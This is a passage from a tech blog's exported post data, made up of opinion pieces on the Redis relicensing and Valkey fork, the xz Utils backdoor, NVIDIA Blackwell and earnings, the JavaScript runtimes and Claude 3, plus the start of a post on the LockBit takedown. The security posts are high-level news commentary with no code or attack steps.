Ericsson, and Snap. The project already has maintainers from multiple companies, including former Redis contributors, and has declared its intent to remain under the BSD license.\nThis is the open source immune system at work. When a widely-used project changes its social contract, the community routes around the damage. We saw it with OpenOffice begetting LibreOffice, MySQL leading to MariaDB, and CentOS spawning Rocky Linux and AlmaLinux. The same pattern emerged with Terraform licensing changes, where the community quickly established OpenTOFU as a BSD-licensed alternative. The pattern is so predictable at this point that it should be in every VC\u0026rsquo;s risk assessment for open source companies.\nWhat makes Valkey interesting is the Linux Foundation\u0026rsquo;s involvement from day one. This isn\u0026rsquo;t a scrappy fork maintained by a handful of frustrated developers — it\u0026rsquo;s a well-funded, organizationally backed project with major cloud providers committing engineering resources. AWS alone has a massive incentive to make Valkey succeed; their ElastiCache service depends on Redis compatibility.\nThe Sustainability Paradox # Here\u0026rsquo;s where I get philosophical — and maybe a bit grumpy. I\u0026rsquo;ve been building systems with Redis since 2012. It\u0026rsquo;s genuinely excellent software, and Salvatore Sanfilippo (antirez) deserves enormous credit for creating something that\u0026rsquo;s simultaneously simple, fast, and versatile. But the fundamental tension in commercial open source has never been resolved.\nThe paradox goes like this: to build a successful open source project, you need to make it as permissive and easy to adopt as possible. But to build a successful business around that project, you eventually need to restrict that same permissiveness. Every company built on an open source core eventually faces this moment. Some handle it gracefully (Red Hat\u0026rsquo;s model worked for decades). Others\u0026hellip; don\u0026rsquo;t.\nRedis Labs\u0026rsquo; frustration is legitimate. They employ many of the Redis core developers. They fund the development of modules, testing infrastructure, and documentation. Watching AWS profit enormously from their work while contributing relatively little back is genuinely unfair. But \u0026ldquo;fair\u0026rdquo; and \u0026ldquo;strategically smart\u0026rdquo; aren\u0026rsquo;t always the same thing.\nWhat This Means for Your Stack # If you\u0026rsquo;re running Redis in production — and statistically, you probably are — here\u0026rsquo;s my practical assessment:\nShort term (next 6 months): Nothing changes. Your existing Redis deployments continue to work. The license change only affects new versions, and there\u0026rsquo;s no immediate need to upgrade.\nMedium term (6-18 months): You need to make a choice. Continue with Redis under the new license (fine for most use cases — the restrictions only apply to service providers), or start evaluating Valkey as a drop-in replacement. Given that Valkey is forked from Redis 7.2.4, compatibility should be nearly perfect initially.\nLong term: This is where it gets murky. Redis and Valkey will diverge. Features will be added to one but not the other. Performance characteristics may differ. The ecosystem will fragment — some client libraries may optimize for Redis, others for Valkey. I\u0026rsquo;d recommend watching both projects closely and avoiding deep dependencies on features specific to either.\nMy Take # I\u0026rsquo;m disappointed but not surprised. The VC-funded open source model has a fundamental design flaw: it creates a time bomb where the interests of the company and the community inevitably diverge. Redis held out longer than most, but the pattern is clear.\nMy bet is on Valkey succeeding. Not because it\u0026rsquo;s technically superior — right now it\u0026rsquo;s literally the same code — but because the combination of Linux Foundation governance, multi-cloud backing, and genuine community goodwill is a powerful force. LibreOffice overtook OpenOffice. MariaDB became the default in most Linux distributions. OpenTOFU\u0026rsquo;s rapid adoption after HashiCorp\u0026rsquo;s licensing change demonstrated that the fork, when backed by sufficient institutional support, tends to win.\nFor Redis Labs, this license change may solve their cloud provider problem in the short term, but at the cost of community trust that took a decade to build. That\u0026rsquo;s a trade I wouldn\u0026rsquo;t have made.\n","date":"4 April 2024","externalUrl":null,"permalink":"/posts/240404-redis-relicensing-valkey-fork/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Redis Labs switches from BSD to a dual SSPL/RSALv2 license, and the Linux Foundation responds by backing the Valkey fork.","title":"Redis Goes Proprietary, the Community Forks — Enter Valkey","type":"posts"},{"content":"If you haven\u0026rsquo;t heard about CVE-2024-3094 yet, stop what you\u0026rsquo;re doing and pay attention. A backdoor was discovered in xz Utils — specifically in versions 5.6.0 and 5.6.1 of the liblzma library — that would have compromised SSH authentication on virtually every major Linux distribution. This wasn\u0026rsquo;t some amateur script kiddie exploit. This was a patient, sophisticated, multi-year social engineering attack on the open source supply chain, and it was caught almost by accident.\nThe discovery credit goes to Andres Freund, a Microsoft engineer and PostgreSQL developer, who noticed that SSH logins on his Debian sid system were taking about 500 milliseconds longer than expected. Most of us would have blamed the network. Freund dug deeper and found obfuscated malicious code injected into the xz build process. That kind of curiosity and thoroughness quite literally saved the internet.\nThe Attack: A Masterclass in Social Engineering # What makes this attack so terrifying isn\u0026rsquo;t the technical payload — it\u0026rsquo;s the social engineering that enabled it. The attacker, operating under the pseudonym \u0026ldquo;Jia Tan,\u0026rdquo; spent roughly two years building trust within the xz project. They started with legitimate, helpful contributions in 2022. They gradually took on more maintainer responsibilities as the original maintainer, Lasse Collin, struggled with bandwidth and (reportedly) burnout.\nBy 2024, Jia Tan had enough commit access and trust to insert a carefully obfuscated backdoor into the build system. The malicious code wasn\u0026rsquo;t in the source repository directly — it was hidden in test fixture files and activated through a series of build script modifications that would only trigger during specific packaging conditions. The binary artifacts contained code that hooked into OpenSSH\u0026rsquo;s authentication process via systemd\u0026rsquo;s use of liblzma, effectively allowing the attacker to bypass SSH authentication on affected systems.\nLet me be blunt: this is the most sophisticated supply chain attack I\u0026rsquo;ve ever seen. And I\u0026rsquo;ve been watching these for decades. The level of patience, the quality of the legitimate contributions used to build trust, the clever obfuscation — this was almost certainly a state-sponsored operation.\nThe Terrifying Timeline # Here\u0026rsquo;s what keeps me up at night about this. The compromised versions (5.6.0 released February 24, 5.6.1 on March 9) had already made it into several rolling-release and testing distributions:\nFedora 40 and Fedora Rawhide Debian testing and unstable openSUSE Tumbleweed and MicroOS Kali Linux Arch Linux The only reason this didn\u0026rsquo;t reach Ubuntu 24.04 LTS, Debian stable, RHEL, or other production distributions is timing. If this had been discovered even a few weeks later, we\u0026rsquo;d be looking at a compromise of millions of production servers worldwide. The advisory from Red Hat went out with maximum urgency, and rightly so.\nWhat the Backdoor Actually Does # The technical details are still being analyzed by the security community, but here\u0026rsquo;s what we know so far. The malicious code targets the RSA key verification process in OpenSSH — but only on systems where sshd is linked against systemd (which pulls in liblzma). When a specially crafted SSH authentication request is received, the backdoor intercepts the RSA signature verification, checks for a specific attacker-controlled key, and if present, grants access without valid credentials.\nIn effect, anyone holding the attacker\u0026rsquo;s private key could log into any compromised system as root. No password, no legitimate key needed. Just silent, invisible access to critical infrastructure worldwide.\nThe obfuscation techniques were remarkable. The malicious payload was hidden in binary test files (bad-3-corrupt_lzma2.xz and good-large_compressed.lzma), extracted and injected only during the build process, and only when certain conditions were met (building on x86_64 Linux with GCC using specific build flags). If you built from the Git source directly, the backdoor wasn\u0026rsquo;t there — it only appeared in the distributed tarballs. Clever, and deeply unsettling.\nThe Open Source Sustainability Crisis # I\u0026rsquo;ve been saying for years that we have a critical sustainability problem in open source, and this incident proves it in the most dramatic way possible. Lasse Collin, the xz maintainer, was effectively a single point of failure for a compression library embedded in the boot chain of every major Linux distribution. He was burned out, accepting help from anyone willing to give it.\nThe attacker exploited this. There were even sock puppet accounts pressuring Collin to hand over maintainer access, posting complaints about slow response times and suggesting Jia Tan as a reliable co-maintainer. This is social engineering at its most insidious — it weaponized the open source community\u0026rsquo;s own culture of volunteerism and trust.\nWe need to have a serious conversation about how critical infrastructure libraries get maintained and funded. The fact that a library used by billions of devices was maintained by essentially one person, unpaid, is not a badge of honor for the open source community. It\u0026rsquo;s a systemic failure.\nMy Take # In thirty years of working with software, this is one of the scariest security incidents I\u0026rsquo;ve witnessed — not because of the damage it caused (it was caught in time) but because of how close it came to succeeding. If Andres Freund had been having a busy week, if he\u0026rsquo;d dismissed the latency as network jitter, we might not have caught this for months.\nEvery organization running Linux infrastructure needs to do three things right now:\nVerify your xz version — if you\u0026rsquo;re running 5.6.0 or 5.6.1, downgrade immediately Audit your dependency chains — know which critical libraries your systems depend on and who maintains them Fund open source — if your business depends on open source software (it does), contribute to the sustainability of the projects you rely on This was a wake-up call. Whether we actually wake up remains to be seen.\n","date":"28 March 2024","externalUrl":null,"permalink":"/posts/240328-xz-utils-backdoor-cve-2024-3094/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A sophisticated supply chain attack via the xz Utils compression library was caught just days before reaching stable Linux distributions.","title":"The xz Utils Backdoor — Open Source's Worst Nightmare Almost Came True","type":"posts"},{"content":"NVIDIA\u0026rsquo;s GTC 2024 just wrapped up, and if there\u0026rsquo;s one takeaway it\u0026rsquo;s this: Jensen Huang isn\u0026rsquo;t just selling GPUs anymore — he\u0026rsquo;s selling an entire computing paradigm. The star of the show was the Blackwell B200, NVIDIA\u0026rsquo;s next-generation GPU architecture that promises to make the already-dominant H100 look quaint by comparison. Having watched GPU computing evolve from a niche graphics concern to the backbone of modern AI, I have to say — the numbers this time are genuinely staggering.\nThe Blackwell Architecture: What\u0026rsquo;s Actually New # The B200 is built on a 208 billion transistor design, which NVIDIA claims delivers up to 30x the performance of the H100 for certain AI inference workloads. That\u0026rsquo;s not a typo. The key innovation is something NVIDIA calls a \u0026ldquo;second-generation Transformer Engine\u0026rdquo; that operates in a new FP4 precision format, essentially allowing the chip to do more useful work per clock cycle for the transformer architectures that power today\u0026rsquo;s large language models.\nBut the real engineering flex is the GB200 \u0026ldquo;superchip\u0026rdquo; — two B200 GPUs connected to a single Grace CPU via NVLink, creating what is essentially a self-contained AI training node. NVIDIA showed configurations scaling from a single GB200 to a GB200 NVL72, which packs 72 Blackwell GPUs into a single rack-scale system connected by a fifth-generation NVLink network delivering 130TB/s of bandwidth. For context, that\u0026rsquo;s the kind of interconnect speed that makes InfiniBand look like it\u0026rsquo;s running over dial-up.\nThe technical specs are impressive on paper. The question, as always with NVIDIA announcements, is when this silicon actually ships in volume and at what price. The H100 supply constraints of 2023 are still fresh in everyone\u0026rsquo;s memory.\nWhy This Matters Beyond the Hype # I\u0026rsquo;ve been skeptical of the \u0026ldquo;just throw more GPU at it\u0026rdquo; approach to AI scaling, but Blackwell addresses something I find genuinely important: inference cost. Training a model is a one-time expense (well, sort of). Running that model for millions of users 24/7 is what actually breaks your infrastructure budget. NVIDIA\u0026rsquo;s claim that Blackwell can reduce inference cost and energy consumption by up to 25x compared to H100 is, if even partially true, transformative.\nConsider what this means practically. Right now, running a large language model at scale requires a small fortune in GPU rental costs. Companies like OpenAI are reportedly spending hundreds of millions on compute. If Blackwell delivers even half of its promised efficiency gains, it could democratize access to large-scale AI inference — or at least make it something a well-funded startup can afford rather than just hyperscalers.\nThe energy angle matters too. I\u0026rsquo;ve been tracking the power consumption of AI workloads with growing concern. A single H100 pulls around 700W. Data centers are already struggling with power density. NVIDIA\u0026rsquo;s pitch that Blackwell does more work per watt is as much about keeping the lights on as it is about performance.\nThe Platform Play # What struck me most about Jensen\u0026rsquo;s keynote wasn\u0026rsquo;t the raw hardware specs — it was how aggressively NVIDIA is positioning itself as an end-to-end platform company. NIM (NVIDIA Inference Microservices), CUDA libraries optimized specifically for Blackwell, partnerships with every major cloud provider for \u0026ldquo;NVIDIA Cloud\u0026rdquo; instances — this is a company that understands the moat isn\u0026rsquo;t just the silicon. It\u0026rsquo;s the software ecosystem that makes the silicon useful.\nI\u0026rsquo;ve seen this playbook before. It\u0026rsquo;s the same strategy that made Intel dominant in the server market for two decades: make the hardware great, but make the software tooling so deeply integrated that switching away is painful. NVIDIA\u0026rsquo;s CUDA lock-in has been debated for years, and Blackwell doubles down on it. Every new architecture brings new CUDA features that have no direct equivalent in AMD\u0026rsquo;s ROCm or Intel\u0026rsquo;s oneAPI.\nFor developers, this is both an opportunity and a concern. The opportunity is clear — Blackwell will enable AI applications that simply aren\u0026rsquo;t feasible on current hardware. The concern is the growing monoculture. When one company controls the entire stack from silicon to software framework, the industry is one price increase away from a very uncomfortable reckoning.\nMy Take # After thirty years in this industry, I\u0026rsquo;ve learned to separate genuine technological leaps from marketing events. GTC 2024 felt like the former. The Blackwell architecture isn\u0026rsquo;t just \u0026ldquo;more of the same, but faster\u0026rdquo; — the architectural changes around FP4 precision, the NVLink scaling, and the GB200 superchip design represent real engineering innovation.\nThat said, I have a nagging concern. NVIDIA\u0026rsquo;s dominance in AI compute is now so complete that it\u0026rsquo;s starting to look like a single point of failure for an entire industry. Every major AI company, every cloud provider, every research lab is dependent on one company\u0026rsquo;s product roadmap and supply chain. We\u0026rsquo;ve been here before with other monopolies in tech, and it never ends well for the customers.\nFor now, though, if you\u0026rsquo;re building AI infrastructure, Blackwell is going to be the benchmark everything else gets measured against. Start planning your budgets accordingly — and maybe diversify your compute strategy while you\u0026rsquo;re at it. The best time to reduce vendor dependency was five years ago. The second best time is today.\n","date":"21 March 2024","externalUrl":null,"permalink":"/posts/240321-nvidia-blackwell-gtc-2024/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"NVIDIA unveils the Blackwell B200 GPU at GTC 2024, promising a generational leap in AI training and inference performance.","title":"NVIDIA Blackwell at GTC 2024 — The GPU That Wants to Eat the Data Center","type":"posts"},{"content":"For most of Node.js\u0026rsquo;s existence, the JavaScript server-side runtime landscape was simple: there was Node, and there was everything else (which nobody used). That era is definitively over. Bun shipped its 1.0 release last September and has been iterating rapidly since. Deno just released version 1.41 with expanded Node.js compatibility. And Node.js itself, now under active development for version 22, is adopting features at a pace that would have been unthinkable three years ago. For the first time, JavaScript developers have a genuine choice — and competition is making everyone better.\nThe State of Bun # Bun landed with bold claims last year: dramatically faster startup times, a built-in bundler, a built-in test runner, native TypeScript support, and SQLite baked right into the runtime. Six months post-1.0, the picture is more nuanced.\nThe performance claims largely hold up for specific benchmarks. Bun\u0026rsquo;s HTTP server and file I/O operations are measurably faster than Node.js in many scenarios. Startup time is significantly better — Bun can start a process in under 10 milliseconds where Node typically takes 30-50ms. For serverless functions and CLI tools where cold start matters, that\u0026rsquo;s a meaningful difference.\nBut real-world application performance tells a more complex story. Most production web applications are bottlenecked by database queries, external API calls, and business logic — not runtime overhead. When your request spends 200ms waiting for PostgreSQL, the 20ms you save on runtime startup becomes noise.\nWhere Bun genuinely shines is developer experience. Having a bundler, test runner, and package manager built into the runtime eliminates a significant amount of tooling configuration. Running bun test instead of configuring Jest, or bun build instead of setting up webpack/esbuild/rollup, reduces the ceremony of starting a new project. For someone who\u0026rsquo;s spent years wrestling with Node.js toolchain configuration, this is deeply appealing.\nThe compatibility story is Bun\u0026rsquo;s biggest challenge. While they\u0026rsquo;ve implemented a large subset of Node.js APIs, edge cases and less common modules still break. If you\u0026rsquo;re running a mature production codebase with dozens of dependencies, migrating to Bun today requires thorough testing and a tolerance for discovering compatibility gaps.\nDeno\u0026rsquo;s Node.js Compatibility Play # Deno has taken a fascinating strategic turn. Ryan Dahl originally created Deno as a \u0026ldquo;do-over\u0026rdquo; for Node.js — fixing the mistakes he felt he\u0026rsquo;d made the first time. It launched with security-first permissions, native TypeScript, URL-based imports, and a deliberate break from Node.js compatibility.\nThat ideological purity didn\u0026rsquo;t win the market. The Node.js ecosystem — millions of npm packages, established patterns, existing codebases — proved to be an overwhelming gravitational force. So Deno pivoted.\nDeno 1.28 added npm compatibility. Each subsequent release has expanded it. As of Deno 1.41, you can import most npm packages directly using npm: specifiers, use package.json for dependency management, and run many Node.js applications with minimal changes. This pragmatic shift acknowledges that npm\u0026rsquo;s ecosystem gravitational pull was too strong for ideological purism.\nWhat Deno retains from its original vision is worth noting:\nSecurity by default: code can\u0026rsquo;t access the filesystem, network, or environment without explicit permission flags. In a world of supply chain attacks, this matters. Built-in formatting and linting: deno fmt and deno lint are available without installing anything. Native TypeScript: no compilation step, no tsconfig juggling. Web standard APIs: Deno implements fetch, Web Streams, and other browser APIs natively, making code more portable between server and browser. Deno Deploy, their edge hosting platform, adds another dimension — a Cloudflare Workers competitor that\u0026rsquo;s deeply integrated with the runtime.\nNode.js Is Not Standing Still # Here\u0026rsquo;s what often gets missed in the \u0026ldquo;Node.js killer\u0026rdquo; narratives: Node.js is evolving faster now than at any point in the past five years, and the competition deserves credit for that.\nNode.js 21 (current) and the upcoming Node.js 22 include features that directly address the advantages Bun and Deno claimed:\nBuilt-in test runner: node --test is stable and improving rapidly. It\u0026rsquo;s not as polished as Bun\u0026rsquo;s yet, but it eliminates the Jest dependency for many use cases. Native TypeScript support is being actively discussed, with experimental strip-types proposals in the works. Permission model: Node.js 20 introduced an experimental permission model inspired directly by Deno. It\u0026rsquo;s not default-on like Deno\u0026rsquo;s, but it\u0026rsquo;s there. Performance improvements: V8 engine updates, startup optimizations, and the Maglev compiler are narrowing the performance gap. Single executable applications: Node.js can now compile applications into standalone executables, a feature that Bun and Deno both offered first. Watch mode: node --watch provides built-in file watching, reducing the need for nodemon. The message is clear: Node.js is absorbing the best ideas from its competitors while maintaining the massive ecosystem advantage that keeps it dominant.\nHow to Think About Choosing # After spending time with all three runtimes over the past few months, here\u0026rsquo;s my practical framework:\nChoose Node.js if: you have an existing codebase, need maximum ecosystem compatibility, or are hiring developers who need to be productive immediately. It\u0026rsquo;s still the safe choice, and \u0026ldquo;safe\u0026rdquo; isn\u0026rsquo;t a criticism — it means your dependencies work, your deployment pipeline is tested, and Stack Overflow has answers for your questions.\nChoose Bun if: you\u0026rsquo;re starting a new project, value developer experience, and are willing to work around occasional compatibility issues. Bun is particularly compelling for tooling, scripts, and new API projects where you can control the dependency tree.\nChoose Deno if: security is a first-class concern, you want the best TypeScript experience, or you\u0026rsquo;re building for Deno Deploy. The npm compatibility improvements make it viable for a much wider range of projects than a year ago.\nMy Take # I\u0026rsquo;ve been building with Node.js since 2012. It\u0026rsquo;s served me well, and I don\u0026rsquo;t see it going away anytime soon. But I\u0026rsquo;m genuinely excited about the competitive pressure that Bun and Deno are creating.\nThe JavaScript ecosystem\u0026rsquo;s biggest problem has always been tooling fragmentation — the endless churn of build tools, test frameworks, and configuration formats. Both Bun and Deno address this by building more into the runtime itself. Node.js is following suit. The end result, regardless of which runtime wins, is a better developer experience for everyone.\nMy prediction: in two years, all three runtimes will have converged significantly in features. The differentiators will be ecosystem size (Node.js advantage), performance characteristics (Bun advantage), and security model (Deno advantage). And most developers will use whichever one their framework of choice supports best. That\u0026rsquo;s competition working exactly as it should.\n","date":"14 March 2024","externalUrl":null,"permalink":"/posts/240314-javascript-runtime-wars-bun-deno-node/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"With Bun 1.0 maturing, Deno pushing Node compatibility, and Node.js evolving faster than ever, the JavaScript runtime landscape is more interesting than it’s been in years.","title":"The JavaScript Runtime Wars — Bun, Deno, and Node.js in 2024","type":"posts"},{"content":"Anthropic released their Claude 3 model family on March 4th, and for the first time, we have a credible challenger to GPT-4 across a wide range of benchmarks. The release comes in three tiers — Haiku (fast and cheap), Sonnet (balanced), and Opus (maximum capability) — and the top-end Opus model outperforms GPT-4 on a majority of standard evaluation benchmarks. After months of incremental updates from various labs, this feels like a genuine step function.\nThe Three-Tier Strategy # What\u0026rsquo;s smart about Anthropic\u0026rsquo;s approach is the explicit tiering. Rather than releasing a single model and hoping it fits every use case, they\u0026rsquo;ve built three distinct options:\nClaude 3 Haiku is designed for near-instant responses at low cost. Anthropic claims it can process a 10K-token research paper with charts and graphs in under three seconds. For high-volume, latency-sensitive applications — think customer support, content classification, or real-time code suggestions — this is the tier you\u0026rsquo;d use.\nClaude 3 Sonnet sits in the middle, offering what Anthropic describes as an \u0026ldquo;ideal balance of intelligence and speed.\u0026rdquo; It\u0026rsquo;s priced at roughly 60-80% less than Opus while still outperforming Claude 2.1 on most benchmarks. For the majority of production workloads, this is probably the sweet spot.\nClaude 3 Opus is the flagship. It scores 86.8% on the MMLU benchmark (compared to GPT-4\u0026rsquo;s 86.4%), 95.0% on GSM8K math problems, and shows significant improvements in coding tasks. But the numbers I find most interesting are in the reasoning and analysis benchmarks, where Opus shows notably fewer hallucinations than both Claude 2 and GPT-4.\nThis tiered approach mirrors what we\u0026rsquo;ve seen work in cloud computing — offering different performance/cost tradeoffs lets developers optimize for their specific constraints rather than paying for capabilities they don\u0026rsquo;t need.\nThe Vision Capability # All three Claude 3 models now support multimodal input — they can process images alongside text. This is a significant addition. Claude 2 was text-only, which was a real limitation compared to GPT-4V, and multimodal has become the baseline expectation.\nThe vision capability handles photos, charts, diagrams, and technical documents. In my initial testing, I\u0026rsquo;ve been feeding it architecture diagrams and asking for analysis. The results are surprisingly good — it correctly identifies components, relationships, and even calls out potential issues in system design diagrams.\nFor development teams, this opens up interesting workflows:\nAnalyzing screenshots of UI bugs alongside error logs Processing whiteboard photos from design sessions into structured specifications Extracting data from charts and graphs in technical PDFs Understanding hand-drawn wireframes and converting them to requirements It\u0026rsquo;s not perfect — complex diagrams with small text can trip it up — but it\u0026rsquo;s functional enough to be genuinely useful.\nReduced Hallucination and Better Instruction Following # The improvement I care about most isn\u0026rsquo;t raw benchmark scores — it\u0026rsquo;s the reduction in hallucinations. Anthropic reports that Claude 3 Opus is significantly less likely to generate false information compared to Claude 2.1. They\u0026rsquo;ve also improved the model\u0026rsquo;s tendency to refuse harmless prompts, which was a frustrating issue with Claude 2 where the model would sometimes decline perfectly reasonable requests out of excessive caution.\nIn practical testing over the past few days, I\u0026rsquo;ve noticed a clear improvement in instruction following. Claude 3 is better at maintaining complex formatting requirements, following multi-step instructions accurately, and staying consistent across long conversations. These are the kinds of improvements that matter more for production applications than headline benchmark numbers.\nThe model also has a 200K token context window across all three tiers, which puts it well ahead of GPT-4\u0026rsquo;s 128K (though behind Google\u0026rsquo;s recently announced Gemini 1.5 Pro at 1 million tokens).\nWhat This Means for the AI Development Landscape # We\u0026rsquo;re now in a genuinely competitive multi-model world, and I think that\u0026rsquo;s unambiguously good for developers. Six months ago, if you needed top-tier LLM capabilities, GPT-4 was essentially your only option. Now you have:\nGPT-4 Turbo from OpenAI: strong all-around, 128K context, extensive tool use ecosystem Claude 3 Opus from Anthropic: competitive or better on benchmarks, 200K context, strong on analysis and coding Gemini 1.5 Pro from Google: million-token context, MoE architecture, strong on long-document tasks Competition drives prices down and capabilities up. We\u0026rsquo;re already seeing this — Claude 3 Sonnet offers performance comparable to GPT-4 at significantly lower cost. OpenAI will have to respond, either with price cuts or capability improvements.\nFor architecture decisions, this multi-model landscape argues strongly for building abstraction layers in your AI integration code. If you\u0026rsquo;re hard-coding calls to a specific model\u0026rsquo;s API, you\u0026rsquo;re leaving money and capability on the table. The right model for a task today might not be the right model next quarter.\nMy Take # I\u0026rsquo;ve been using Claude as part of my development workflow since the original release, and Claude 3 is the first version that makes me reach for it as often as GPT-4. The instruction following improvements alone make a noticeable difference in day-to-day usage.\nThe three-tier approach is the right strategy. In production systems, you almost always want to use the cheapest model that meets your quality bar. Having a clear performance/cost ladder lets you make that optimization explicitly rather than using an expensive model for everything.\nWhat I\u0026rsquo;m watching most closely is the developer tooling ecosystem. OpenAI has a significant lead here with their function calling, assistants API, and broad third-party integration support. Anthropic\u0026rsquo;s API is clean but more basic. As models converge in raw capability, the developer experience and tooling around them becomes the differentiator.\nThe pace of improvement across all these labs is remarkable. Six months ago, Claude 2 was clearly a tier below GPT-4. Now Claude 3 Opus is arguably at parity or better. If this pace continues — and there\u0026rsquo;s no sign it\u0026rsquo;s slowing — the capabilities available to developers by the end of 2024 will make today\u0026rsquo;s models look quaint. It\u0026rsquo;s a genuinely exciting time to be building with these tools.\n","date":"7 March 2024","externalUrl":null,"permalink":"/posts/240307-anthropic-claude-3-benchmarks/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Anthropic launches Claude 3 in three tiers — Haiku, Sonnet, and Opus — with benchmark results that challenge GPT-4’s dominance.","title":"Claude 3 Arrives — Anthropic's New Family of Models Raises the Bar","type":"posts"},{"content":"NVIDIA just reported quarterly revenue of $22.1 billion — a 265% increase year-over-year. Their data center division alone brought in $18.4 billion, up 409% from the same quarter last year. These aren\u0026rsquo;t numbers from a speculative bubble. They represent real hardware being bought by real companies building real infrastructure. And if you\u0026rsquo;re a developer or architect working with cloud services, these numbers should reshape how you think about what\u0026rsquo;s coming.\nThe Numbers Behind the Numbers # Let\u0026rsquo;s break down what\u0026rsquo;s actually happening. NVIDIA\u0026rsquo;s data center revenue — which is almost entirely driven by AI accelerator sales (H100, A100, and related networking hardware) — now dwarfs their gaming division by a factor of five. The major cloud providers (AWS, Azure, GCP) are collectively spending tens of billions on GPU clusters. Meta alone announced plans to deploy 350,000 H100 GPUs by the end of 2024.\nBut it\u0026rsquo;s not just the hyperscalers. Enterprise buyers are entering the market aggressively. NVIDIA reported that enterprise and sovereign AI infrastructure orders are growing fast. Countries and large corporations want their own AI compute capacity, not just rented access through cloud APIs.\nJensen Huang called it the start of a new computing era on the earnings call. Normally I\u0026rsquo;d dismiss that as CEO hyperbole, but the financial data actually supports the claim. The capital expenditure flowing into AI infrastructure right now is comparable to the early buildout of cloud computing in the 2010-2015 era — except it\u0026rsquo;s happening faster.\nWhat This Means for Cloud Architecture # If you\u0026rsquo;re designing systems that will run in the cloud over the next few years, the GPU investment wave has direct implications:\nGPU availability is improving but still constrained. Six months ago, getting H100 allocation from any major cloud provider required either a massive spending commitment or a long wait list. The supply situation is improving — NVIDIA shipped record volumes this quarter — but demand continues to outpace supply. If your roadmap includes GPU-dependent workloads, plan ahead to secure capacity.\nPricing models are evolving. AWS, Azure, and GCP are all introducing new GPU instance types and pricing tiers. We\u0026rsquo;re seeing the emergence of GPU spot markets, reserved capacity models, and inference-optimized instances that offer different price/performance tradeoffs than training instances. Understanding these options is becoming as important as understanding traditional compute pricing.\nNetwork architecture matters more than ever. Training large models requires not just GPUs but high-bandwidth, low-latency interconnects between them. NVIDIA\u0026rsquo;s InfiniBand and new NVLink networking technologies are becoming critical infrastructure components. If you\u0026rsquo;re building ML platforms, your network topology decisions now have as much impact as your GPU selection.\nEdge inference is the next frontier. While the current spending is heavily focused on training infrastructure, the logical next step is deploying inference at the edge. NVIDIA\u0026rsquo;s Jetson platform and the growing ecosystem of inference-optimized hardware suggest that the GPU buildout will extend beyond centralized data centers.\nThe Software Layer Opportunity # Here\u0026rsquo;s what I find most interesting as a developer: all this hardware needs software. The gap between \u0026ldquo;we bought a bunch of GPUs\u0026rdquo; and \u0026ldquo;we\u0026rsquo;re generating business value from AI\u0026rdquo; is filled entirely by software engineering.\nNVIDIA\u0026rsquo;s CUDA ecosystem has been their real moat for over a decade. But the software stack is getting more complex and more interesting:\nInference optimization frameworks like TensorRT and vLLM are becoming essential for making models actually deployable at reasonable cost. Training a model is one thing; serving it to millions of users at acceptable latency and cost is an entirely different engineering challenge.\nOrchestration and scheduling for GPU workloads is still immature compared to CPU workload management. Kubernetes GPU scheduling, NVIDIA\u0026rsquo;s Triton inference server, and emerging platforms like Ray are all vying to become the standard. There\u0026rsquo;s a lot of room for innovation here.\nMonitoring and observability for GPU workloads requires different tools and metrics than traditional applications. GPU utilization, memory bandwidth, thermal throttling, and model serving latency all need dedicated tooling.\nThis is where I think the real opportunities lie for developers and DevOps engineers. The companies buying all this hardware need people who can actually make it useful. CUDA programming, ML ops, inference optimization — these are skills that are going to be in high demand for years.\nThe Sustainability Question # Something that doesn\u0026rsquo;t get enough attention in the AI infrastructure conversation: power consumption. A single H100 GPU draws around 700 watts. A cluster of 350,000 of them — like Meta is building — draws roughly 245 megawatts just for the GPUs, before accounting for cooling, networking, and storage. That\u0026rsquo;s the output of a small power plant dedicated to a single company\u0026rsquo;s AI workloads.\nThe energy requirements of AI infrastructure are already straining data center capacity in key markets. Reports indicate that new data center construction in Northern Virginia — the world\u0026rsquo;s largest data center market — is being delayed by power availability. This isn\u0026rsquo;t a theoretical concern; it\u0026rsquo;s a concrete constraint that\u0026rsquo;s affecting deployment timelines today.\nAs engineers, we should be thinking about computational efficiency not just as a cost optimization but as a responsibility. Model distillation, quantization, efficient architectures, and smart caching strategies aren\u0026rsquo;t just nice-to-haves — they\u0026rsquo;re essential for making AI infrastructure sustainable at scale.\nMy Take # I\u0026rsquo;ve seen multiple hardware investment cycles in my career — the PC revolution, the dot-com infrastructure buildout, the cloud migration wave, the mobile explosion. The AI infrastructure buildout shares characteristics with all of them, but the velocity is unprecedented.\nWhat gives me confidence this isn\u0026rsquo;t a bubble is the breadth of adoption. It\u0026rsquo;s not just tech companies buying GPUs. It\u0026rsquo;s banks, pharmaceutical companies, manufacturers, and governments. The use cases are real, even if some are still being figured out.\nFor developers, the message is clear: understanding GPU infrastructure, ML operations, and AI system design is becoming as fundamental as understanding cloud computing was a decade ago. You don\u0026rsquo;t have to become an ML researcher, but you should understand how these systems work, how they\u0026rsquo;re deployed, and how they\u0026rsquo;re maintained. The infrastructure being built today will define the platform we all build on for the next decade.\n","date":"29 February 2024","externalUrl":null,"permalink":"/posts/240229-nvidia-earnings-ai-infrastructure-boom/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"NVIDIA’s record Q4 earnings reveal the staggering scale of AI infrastructure investment and what it means for developers and cloud architecture.","title":"NVIDIA's $22 Billion Quarter — The AI Infrastructure Gold Rush Is Real","type":"posts"},{"content":"On February 19th, something happened that many of us in the industry thought we might never see: a coordinated international law enforcement operation — dubbed \u0026ldquo;Operation Cronos\u0026rdquo; — successfully seized and disrupted the infrastructure of LockBit, arguably the most prolific ransomware operation in the world. The UK\u0026rsquo;s National Crime Agency, working with the FBI, Europol, and agencies from ten countries, didn\u0026rsquo;t just take down servers. They took over LockBit\u0026rsquo;s own leak site and used it to post countdown timers revealing the identities of the operators. That\u0026rsquo;s a level of trolling that even the most seasoned security researchers appreciated.\nThe Scale of LockBit # For those who haven\u0026rsquo;t been tracking ransomware trends closely, LockBit has been the dominant ransomware-as-a-service (RaaS) operation since roughly 2022. They claimed responsibility for over 2,000 attacks globally, extracting more than $120 million in ransom payments according to the US Department of Justice. Their victims included hospitals, schools, financial institutions, and critical infrastructure across dozens of countries.\nWhat made LockBit particularly dangerous was their business model innovation. They ran a slick affiliate program — essentially franchising their ransomware to other criminals. Affiliates would gain access to victim networks, deploy 